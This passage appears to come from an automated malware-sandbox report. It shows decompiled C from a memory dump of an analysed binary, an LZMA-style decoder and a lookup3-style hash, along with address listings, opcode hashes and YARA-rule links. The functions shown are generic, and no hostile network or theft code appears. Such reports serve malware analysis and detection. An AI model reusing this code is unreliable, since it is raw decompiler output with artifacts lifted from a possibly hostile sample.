										 *((char*)(_v68 + _t616)) = _v25;
										_t616 = _t616 + 1;
										__eflags = _t616 - _v72;
										if(_t616 == _v72) {
											_t616 = 0;
											__eflags = 0;
										}
										 *_v108 = _v25;
										_v24 = _v24 + 1;
										__eflags = _v64 - _v72;
										if(_v64 < _v72) {
											_v64 = _v64 + 1;
										}
										goto L24;
									}
									return 1;
								}
								_t448 = (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + _v20 + 0xe6c;
								__eflags = _t474 - 7;
								if(__eflags < 0) {
									_v25 = E00425444(_t448,  &_v136, __eflags);
								} else {
									_v96 = _t616 - _t617;
									__eflags = _v96 - _v72;
									if(__eflags >= 0) {
										_t161 =  &_v96;
										 *_t161 = _v96 + _v72;
										__eflags =  *_t161;
									}
									_v89 =  *((intOrPtr*)(_v68 + _v96));
									_v25 = E00425470(_t448, _v89,  &_v136, __eflags);
								}
								 *_v108 = _v25;
								_v24 = _v24 + 1;
								_v108 = _v108 + 1;
								__eflags = _v64 - _v72;
								if(_v64 < _v72) {
									_t180 =  &_v64;
									 *_t180 = _v64 + 1;
									__eflags =  *_t180;
								}
								 *((char*)(_v68 + _t616)) = _v25;
								_t616 = _t616 + 1;
								__eflags = _t616 - _v72;
								if(_t616 == _v72) {
									_t616 = 0;
									__eflags = 0;
								}
								__eflags = _t474 - 4;
								if(_t474 >= 4) {
									__eflags = _t474 - 0xa;
									if(_t474 >= 0xa) {
										_t474 = _t474 - 6;
									} else {
										_t474 = _t474 - 3;
									}
								} else {
									_t474 = 0;
								}
								goto L93;
							}
							return 1;
						}
						return _v116;
					}
					L94:
					 *((intOrPtr*)(_v8 + 0x20)) = _v128;
					 *((intOrPtr*)(_v8 + 0x24)) = _v124;
					 *((intOrPtr*)(_v8 + 0x28)) = _t616;
					 *((intOrPtr*)(_v8 + 0x2c)) = _v60 + _v24;
					 *((intOrPtr*)(_v8 + 0x30)) = _v64;
					 *((intOrPtr*)(_v8 + 0x34)) = _t617;
					 *((intOrPtr*)(_v8 + 0x38)) = _v44;
					 *((intOrPtr*)(_v8 + 0x3c)) = _v48;
					 *((intOrPtr*)(_v8 + 0x40)) = _v52;
					 *(_v8 + 0x44) = _t474;
					 *((intOrPtr*)(_v8 + 0x48)) = _v56;
					 *((char*)(_v8 + 0x4c)) = _v76;
					 *((intOrPtr*)(_v8 + 0x14)) = _v136;
					 *((intOrPtr*)(_v8 + 0x18)) = _v132;
					 *_a4 = _v24;
					__eflags = 0;
					return 0;
				}
				_v80 = (0x300 <<  *(_v8 + 4) + _v40) + 0x736;
				_v84 = 0;
				_v108 = _v20;
				__eflags = _v84 - _v80;
				if(_v84 >= _v80) {
					L7:
					_v52 = 1;
					_v48 = 1;
					_v44 = 1;
					_t617 = 1;
					_v60 = 0;
					_v64 = 0;
					_t474 = 0;
					_t616 = 0;
					 *((char*)(_v68 + _v72 - 1)) = 0;
					E00425294( &_v136);
					__eflags = _v116;
					if(_v116 != 0) {
						return _v116;
					}
					__eflags = _v112;
					if(_v112 == 0) {
						__eflags = 0;
						_v56 = 0;
						goto L12;
					} else {
						return 1;
					}
				} else {
					goto L6;
				}
				do {
					L6:
					 *_v108 = 0x400;
					_v84 = _v84 + 1;
					_v108 = _v108 + 2;
					__eflags = _v84 - _v80;
				} while (_v84 < _v80);
				goto L7;
			}
























































                                                            0x004255e8
                                                            0x004255eb
                                                            0x004255ee
                                                            0x004255f9
                                                            0x004255fc
                                                            0x0042560d
                                                            0x0042561e
                                                            0x00425626
                                                            0x0042562f
                                                            0x00425635
                                                            0x0042563b
                                                            0x00425644
                                                            0x0042564d
                                                            0x00425656
                                                            0x0042565f
                                                            0x00425668
                                                            0x00425671
                                                            0x0042567a
                                                            0x00425683
                                                            0x00425689
                                                            0x00425692
                                                            0x00425698
                                                            0x004256a1
                                                            0x004256af
                                                            0x004256b5
                                                            0x004256bb
                                                            0x00000000
                                                            0x004256bd
                                                            0x004256c4
                                                            0x004256c8
                                                            0x004256cd
                                                            0x004256d0
                                                            0x004256dd
                                                            0x004256dd
                                                            0x004256e0
                                                            0x004256e4
                                                            0x00425785
                                                            0x0042578e
                                                            0x004257c3
                                                            0x004257c3
                                                            0x004257c7
                                                            0x00000000
                                                            0x00000000
                                                            0x004257cc
                                                            0x004257cf
                                                            0x00425795
                                                            0x00425797
                                                            0x0042579a
                                                            0x0042579c
                                                            0x0042579c
                                                            0x0042579c
                                                            0x004257a9
                                                            0x004257aa
                                                            0x004257b0
                                                            0x004257b2
                                                            0x004257b5
                                                            0x004257b8
                                                            0x004257b9
                                                            0x004257bc
                                                            0x004257be
                                                            0x004257be
                                                            0x004257be
                                                            0x004257c0
                                                            0x004257c0
                                                            0x004257c0
                                                            0x00000000
                                                            0x004257c0
                                                            0x00000000
                                                            0x004257cf
                                                            0x004257d1
                                                            0x004257d3
                                                            0x004257eb
                                                            0x004257d5
                                                            0x004257df
                                                            0x004257df
                                                            0x004257f0
                                                            0x004257f2
                                                            0x004257f5
                                                            0x004257f8
                                                            0x004257f8
                                                            0x00425801
                                                            0x00425807
                                                            0x0042580a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00425810
                                                            0x00425810
                                                            0x00425819
                                                            0x0042581c
                                                            0x00425820
                                                            0x00000000
                                                            0x00000000
                                                            0x0042582a
                                                            0x0042582e
                                                            0x00425851
                                                            0x00425856
                                                            0x00425858
                                                            0x00425931
                                                            0x00425936
                                                            0x00425937
                                                            0x00425a77
                                                            0x00425a7d
                                                            0x00425a80
                                                            0x00425a83
                                                            0x00425a86
                                                            0x00425a8f
                                                            0x00425a88
                                                            0x00425a88
                                                            0x00425a88
                                                            0x00425a94
                                                            0x00425aac
                                                            0x00425aaf
                                                            0x00425ab5
                                                            0x00425ab9
                                                            0x00425ac0
                                                            0x00425abb
                                                            0x00425abb
                                                            0x00425abb
                                                            0x00425adc
                                                            0x00425adf
                                                            0x00425ae3
                                                            0x00425b5c
                                                            0x00425ae5
                                                            0x00425aeb
                                                            0x00425aee
                                                            0x00425afa
                                                            0x00425afc
                                                            0x00425b00
                                                            0x00425b36
                                                            0x00425b58
                                                            0x00425b02
                                                            0x00425b26
                                                            0x00425b26
                                                            0x00425b00
                                                            0x00425b5f
                                                            0x00425b5f
                                                            0x00425b60
                                                            0x00425b6b
                                                            0x00425b6b
                                                            0x00425b6f
                                                            0x00425b72
                                                            0x00425b84
                                                            0x00425b87
                                                            0x00425b94
                                                            0x00425b89
                                                            0x00425b8c
                                                            0x00425b8c
                                                            0x00425b97
                                                            0x00425b99
                                                            0x00425b9b
                                                            0x00425b9e
                                                            0x00425ba0
                                                            0x00425ba0
                                                            0x00425ba0
                                                            0x00425ba9
                                                            0x00425bb2
                                                            0x00425bb5
                                                            0x00425bb6
                                                            0x00425bb9
                                                            0x00425bbb
                                                            0x00425bbb
                                                            0x00425bbb
                                                            0x00425bbd
                                                            0x00425bc6
                                                            0x00425bc8
                                                            0x00425bcb
                                                            0x00425bce
                                                            0x00425bd2
                                                            0x00000000
                                                            0x00000000
                                                            0x00425bd7
                                                            0x00425bda
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00425bda
                                                            0x00425bdc
                                                            0x00425bdf
                                                            0x00425be2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00425be2
                                                            0x00000000
                                                            0x00425b62
                                                            0x00425b62
                                                            0x00000000
                                                            0x00425b62
                                                            0x00425b60
                                                            0x0042594f
                                                            0x00425954
                                                            0x00425956
                                                            0x00425a06
                                                            0x00425a08
                                                            0x00425a26
                                                            0x00425a28
                                                            0x00425a2f
                                                            0x00425a35
                                                            0x00425a2a
                                                            0x00425a2a
                                                            0x00425a2a
                                                            0x00425a3b
                                                            0x00425a0a
                                                            0x00425a0a
                                                            0x00425a0a
                                                            0x00425a3e
                                                            0x00425a41
                                                            0x00425a43
                                                            0x00425a59
                                                            0x00425a5c
                                                            0x00425a5f
                                                            0x00425a68
                                                            0x00425a61
                                                            0x00425a61
                                                            0x00425a61
                                                            0x00425a6d
                                                            0x00000000
                                                            0x00425a6d
                                                            0x0042597d
                                                            0x0042597f
                                                            0x00000000
                                                            0x00000000
                                                            0x00425985
                                                            0x00425989
                                                            0x00425995
                                                            0x00425998
                                                            0x004259a1
                                                            0x0042599a
                                                            0x0042599a
                                                            0x0042599a
                                                            0x004259a6
                                                            0x004259aa
                                                            0x004259ac
                                                            0x004259af
                                                            0x004259b1
                                                            0x004259b1
                                                            0x004259b1
                                                            0x004259ba
                                                            0x004259c3
                                                            0x004259c6
                                                            0x004259c7
                                                            0x004259ca
                                                            0x004259cc
                                                            0x004259cc
                                                            0x004259cc
                                                            0x004259d4
                                                            0x004259d6
                                                            0x004259dc
                                                            0x004259df
                                                            0x004259e5
                                                            0x004259e5
                                                            0x00000000
                                                            0x004259df
                                                            0x00000000
                                                            0x0042598b
                                                            0x00425888
                                                            0x0042588d
                                                            0x00425890
                                                            0x004258d1
                                                            0x00425892
                                                            0x00425896
                                                            0x0042589c
                                                            0x0042589f
                                                            0x004258a4
                                                            0x004258a4
                                                            0x004258a4
                                                            0x004258a4
                                                            0x004258b0
                                                            0x004258c1
                                                            0x004258c1
                                                            0x004258da
                                                            0x004258dc
                                                            0x004258df
                                                            0x004258e5
                                                            0x004258e8
                                                            0x004258ea
                                                            0x004258ea
                                                            0x004258ea
                                                            0x004258ea
                                                            0x004258f3
                                                            0x004258f6
                                                            0x004258f7
                                                            0x004258fa
                                                            0x004258fc
                                                            0x004258fc
                                                            0x004258fc
                                                            0x004258fe
                                                            0x00425901
                                                            0x0042590a
                                                            0x0042590d
                                                            0x00425917
                                                            0x0042590f
                                                            0x0042590f
                                                            0x0042590f
                                                            0x00425903
                                                            0x00425903
                                                            0x00425903
                                                            0x00000000
                                                            0x00425901
                                                            0x00000000
                                                            0x00425830
                                                            0x00000000
                                                            0x00425822
                                                            0x00425be8
                                                            0x00425bee
                                                            0x00425bf7
                                                            0x00425bfd
                                                            0x00425c09
                                                            0x00425c12
                                                            0x00425c18
                                                            0x00425c21
                                                            0x00425c2a
                                                            0x00425c33
                                                            0x00425c39
                                                            0x00425c42
                                                            0x00425c4b
                                                            0x00425c57
                                                            0x00425c60
                                                            0x00425c69
                                                            0x00425c6b
                                                            0x00000000
                                                            0x00425c6b
                                                            0x00425701
                                                            0x00425704
                                                            0x0042570c
                                                            0x00425712
                                                            0x00425715
                                                            0x0042572e
                                                            0x00425735
                                                            0x00425738
                                                            0x0042573b
                                                            0x0042573e
                                                            0x00425740
                                                            0x00425745
                                                            0x00425748
                                                            0x00425750
                                                            0x00425752
                                                            0x0042575d
                                                            0x00425762
                                                            0x00425766
                                                            0x00000000
                                                            0x00425768
                                                            0x00425770
                                                            0x00425774
                                                            0x00425780
                                                            0x00425782
                                                            0x00000000
                                                            0x00425776
                                                            0x00000000
                                                            0x00425776
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00425717
                                                            0x00425717
                                                            0x0042571a
                                                            0x0042571f
                                                            0x00425722
                                                            0x00425729
                                                            0x00425729
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                            • Instruction ID: 61b87226b6134f121ca287378b5d435c32ef56f555bf4f4916e7d2b2d6d49e77
                                                            • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                            • Instruction Fuzzy Hash: E932E274E00629DFCB14CF99D981AEDBBB2BF88314F64816AD815AB341D734AE42CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004323DC, Relevance: .4, Instructions: 408COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004323DC(signed int* __eax, intOrPtr __ecx, signed int __edx) {
				signed int* _v8;
				signed int* _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				unsigned int* _t96;
				unsigned int* _t106;
				signed int* _t108;
				signed int _t109;

				_t109 = __edx;
				_v16 = __ecx;
				_v12 = __eax;
				_t106 =  &_v24;
				_t108 =  &_v28;
				_t96 =  &_v20;
				 *_t96 = __edx + 0xdeadbeef + _v16;
				 *_t106 =  *_t96;
				 *_t108 =  *_t96;
				_v8 = _v12;
				if((_v8 & 0x00000003) != 0) {
					if(__edx <= 0xc) {
						L20:
						if(_t109 > 0xc) {
							L23:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x18);
							L24:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x10);
							L25:
							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 8);
							L26:
							 *_t108 =  *_t108 + (_v8[2] & 0x000000ff);
							L27:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x18);
							L28:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x10);
							L29:
							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 8);
							L30:
							 *_t106 =  *_t106 + (_v8[1] & 0x000000ff);
							L31:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x18);
							L32:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x10);
							L33:
							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 8);
							L34:
							 *_t96 =  *_t96 + ( *_v8 & 0x000000ff);
							L35:
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x0000000e |  *_t106 >> 0x00000012);
							 *_t96 =  *_t96 ^  *_t108;
							 *_t96 =  *_t96 - ( *_t108 << 0x0000000b |  *_t108 >> 0x00000015);
							 *_t106 =  *_t106 ^  *_t96;
							 *_t106 =  *_t106 - ( *_t96 << 0x00000019 |  *_t96 >> 0x00000007);
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x00000010 |  *_t106 >> 0x00000010);
							 *_t96 =  *_t96 ^  *_t108;
							 *_t96 =  *_t96 - ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
							 *_t106 =  *_t106 ^  *_t96;
							 *_t106 =  *_t106 - ( *_t96 << 0x0000000e |  *_t96 >> 0x00000012);
							 *_t108 =  *_t108 ^  *_t106;
							 *_t108 =  *_t108 - ( *_t106 << 0x00000018 |  *_t106 >> 0x00000008);
							return  *_t108;
						}
						switch( *((intOrPtr*)(_t109 * 4 +  &M00432749))) {
							case 0:
								return  *_t108;
							case 1:
								goto L34;
							case 2:
								goto L33;
							case 3:
								goto L32;
							case 4:
								goto L31;
							case 5:
								goto L30;
							case 6:
								goto L29;
							case 7:
								goto L28;
							case 8:
								goto L27;
							case 9:
								goto L26;
							case 0xa:
								goto L25;
							case 0xb:
								goto L24;
							case 0xc:
								goto L23;
						}
					} else {
						goto L19;
					}
					do {
						L19:
						 *_t96 =  *_t96 + ( *_v8 & 0x000000ff) + ((_v8[0] & 0x000000ff) << 8) + ((_v8[0] & 0x000000ff) << 0x10) + ((_v8[0] & 0x000000ff) << 0x18);
						 *_t106 =  *_t106 + (_v8[1] & 0x000000ff) + ((_v8[1] & 0x000000ff) << 8) + ((_v8[1] & 0x000000ff) << 0x10) + ((_v8[1] & 0x000000ff) << 0x18);
						 *_t108 =  *_t108 + (_v8[2] & 0x000000ff) + ((_v8[2] & 0x000000ff) << 8) + ((_v8[2] & 0x000000ff) << 0x10) + ((_v8[2] & 0x000000ff) << 0x18);
						 *_t96 =  *_t96 -  *_t108;
						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
						 *_t108 =  *_t108 +  *_t106;
						 *_t106 =  *_t106 -  *_t96;
						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
						 *_t96 =  *_t96 +  *_t108;
						 *_t108 =  *_t108 -  *_t106;
						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
						 *_t106 =  *_t106 +  *_t96;
						 *_t96 =  *_t96 -  *_t108;
						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
						 *_t108 =  *_t108 +  *_t106;
						 *_t106 =  *_t106 -  *_t96;
						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
						 *_t96 =  *_t96 +  *_t108;
						 *_t108 =  *_t108 -  *_t106;
						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
						 *_t106 =  *_t106 +  *_t96;
						_t109 = _t109 - 0xc;
						_v8 =  &(_v8[3]);
					} while (_t109 > 0xc);
					goto L20;
				}
				if(__edx <= 0xc) {
					L3:
					if(_t109 > 0xc) {
						goto L35;
					}
					switch( *((intOrPtr*)(_t109 * 4 +  &M004324DD))) {
						case 0:
							return  *_t108;
						case 1:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x000000ff;
							 *__eax =  *__eax + ( *_v8 & 0x000000ff);
							goto L35;
						case 2:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x0000ffff;
							 *__eax =  *__eax + ( *_v8 & 0x0000ffff);
							goto L35;
						case 3:
							_v8 =  *_v8;
							__edx =  *_v8 & 0x00ffffff;
							 *__eax =  *__eax + ( *_v8 & 0x00ffffff);
							goto L35;
						case 4:
							_v8 =  *_v8;
							 *__eax =  *__eax +  *_v8;
							goto L35;
						case 5:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 6:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 7:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							__edx =  *(__edx + 4);
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 8:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx + __edx;
							goto L35;
						case 9:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xa:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xb:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							__edx =  *(__edx + 8);
							 *__ecx =  *__ecx + __edx;
							goto L35;
						case 0xc:
							__edx = _v8;
							 *__eax =  *__eax +  *__edx;
							 *__ebx =  *__ebx +  *(__edx + 4);
							 *__ecx =  *__ecx + __edx;
							goto L35;
					}
				} else {
					goto L2;
				}
				do {
					L2:
					 *_t96 =  *_t96 +  *_v8;
					 *_t106 =  *_t106 + _v8[1];
					 *_t108 =  *_t108 + _v8[2];
					 *_t96 =  *_t96 -  *_t108;
					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
					 *_t108 =  *_t108 +  *_t106;
					 *_t106 =  *_t106 -  *_t96;
					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
					 *_t96 =  *_t96 +  *_t108;
					 *_t108 =  *_t108 -  *_t106;
					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
					 *_t106 =  *_t106 +  *_t96;
					 *_t96 =  *_t96 -  *_t108;
					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
					 *_t108 =  *_t108 +  *_t106;
					 *_t106 =  *_t106 -  *_t96;
					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
					 *_t96 =  *_t96 +  *_t108;
					 *_t108 =  *_t108 -  *_t106;
					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
					 *_t106 =  *_t106 +  *_t96;
					_t109 = _t109 - 0xc;
					_v8 = _v8 + 0xc;
				} while (_t109 > 0xc);
				goto L3;
			}













                                                            0x004323dc
                                                            0x004323e5
                                                            0x004323e8
                                                            0x004323eb
                                                            0x004323ee
                                                            0x004323f1
                                                            0x004323ff
                                                            0x00432403
                                                            0x00432407
                                                            0x0043240c
                                                            0x00432413
                                                            0x0043261d
                                                            0x0043273d
                                                            0x00432740
                                                            0x00432784
                                                            0x0043278e
                                                            0x00432790
                                                            0x0043279a
                                                            0x0043279c
                                                            0x004327a6
                                                            0x004327a8
                                                            0x004327af
                                                            0x004327b1
                                                            0x004327bb
                                                            0x004327bd
                                                            0x004327c7
                                                            0x004327c9
                                                            0x004327d3
                                                            0x004327d5
                                                            0x004327dc
                                                            0x004327de
                                                            0x004327e8
                                                            0x004327ea
                                                            0x004327f4
                                                            0x004327f6
                                                            0x00432800
                                                            0x00432802
                                                            0x00432808
                                                            0x0043280a
                                                            0x0043280c
                                                            0x0043281a
                                                            0x0043281e
                                                            0x0043282c
                                                            0x00432830
                                                            0x0043283e
                                                            0x00432842
                                                            0x00432850
                                                            0x00432854
                                                            0x00432862
                                                            0x00432866
                                                            0x00432874
                                                            0x00432878
                                                            0x00432886
                                                            0x00000000
                                                            0x00432888
                                                            0x00432742
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00432623
                                                            0x00432623
                                                            0x0043264d
                                                            0x0043267a
                                                            0x004326a7
                                                            0x004326ab
                                                            0x004326b9
                                                            0x004326bd
                                                            0x004326c1
                                                            0x004326cf
                                                            0x004326d3
                                                            0x004326d7
                                                            0x004326e5
                                                            0x004326e9
                                                            0x004326ed
                                                            0x004326fb
                                                            0x004326ff
                                                            0x00432703
                                                            0x00432711
                                                            0x00432715
                                                            0x00432719
                                                            0x00432727
                                                            0x0043272b
                                                            0x0043272d
                                                            0x00432730
                                                            0x00432734
                                                            0x00000000
                                                            0x00432623
                                                            0x0043241c
                                                            0x004324cd
                                                            0x004324d0
                                                            0x00000000
                                                            0x00000000
                                                            0x004324d6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0043251b
                                                            0x0043251d
                                                            0x00432523
                                                            0x00000000
                                                            0x00000000
                                                            0x0043252d
                                                            0x0043252f
                                                            0x00432535
                                                            0x00000000
                                                            0x00000000
                                                            0x0043253f
                                                            0x00432541
                                                            0x00432547
                                                            0x00000000
                                                            0x00000000
                                                            0x00432551
                                                            0x00432553
                                                            0x00000000
                                                            0x00000000
                                                            0x0043255a
                                                            0x0043255f
                                                            0x00432561
                                                            0x0043256a
                                                            0x00000000
                                                            0x00000000
                                                            0x00432571
                                                            0x00432576
                                                            0x00432578
                                                            0x00432581
                                                            0x00000000
                                                            0x00000000
                                                            0x00432588
                                                            0x0043258d
                                                            0x0043258f
                                                            0x00432598
                                                            0x00000000
                                                            0x00000000
                                                            0x0043259f
                                                            0x004325a4
                                                            0x004325a9
                                                            0x00000000
                                                            0x00000000
                                                            0x004325b0
                                                            0x004325b5
                                                            0x004325ba
                                                            0x004325bc
                                                            0x004325c5
                                                            0x00000000
                                                            0x00000000
                                                            0x004325cc
                                                            0x004325d1
                                                            0x004325d6
                                                            0x004325d8
                                                            0x004325e1
                                                            0x00000000
                                                            0x00000000
                                                            0x004325e8
                                                            0x004325ed
                                                            0x004325f2
                                                            0x004325f4
                                                            0x004325fd
                                                            0x00000000
                                                            0x00000000
                                                            0x00432604
                                                            0x00432609
                                                            0x0043260e
                                                            0x00432613
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00432422
                                                            0x00432422
                                                            0x00432427
                                                            0x0043242f
                                                            0x00432437
                                                            0x0043243b
                                                            0x00432449
                                                            0x0043244d
                                                            0x00432451
                                                            0x0043245f
                                                            0x00432463
                                                            0x00432467
                                                            0x00432475
                                                            0x00432479
                                                            0x0043247d
                                                            0x0043248b
                                                            0x0043248f
                                                            0x00432493
                                                            0x004324a1
                                                            0x004324a5
                                                            0x004324a9
                                                            0x004324b7
                                                            0x004324bb
                                                            0x004324bd
                                                            0x004324c0
                                                            0x004324c4
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
                                                            • Instruction ID: db30b7f2ad9068286955554028b9aaa685d7675e6c5eb7ed9f8bac599936a457
                                                            • Opcode Fuzzy Hash: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
                                                            • Instruction Fuzzy Hash: 9402E032900235DFDB96CF69C140149B7B6FF8A32472A82D2D854AB229D270BE52DFD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040E9C4, Relevance: .2, Instructions: 195COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
                                                            • Instruction ID: d9bdd0ffc78bce1da46a164adb44ca0a352dc4e9e15995579375b7a7492e944c
                                                            • Opcode Fuzzy Hash: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
                                                            • Instruction Fuzzy Hash: FB61A7456AE7C66FCB07C33008B81D6AF61AE9325478B53EFC8C58A493D10D281EE363
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405AE0, Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                            • Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
                                                            • Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                            • Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

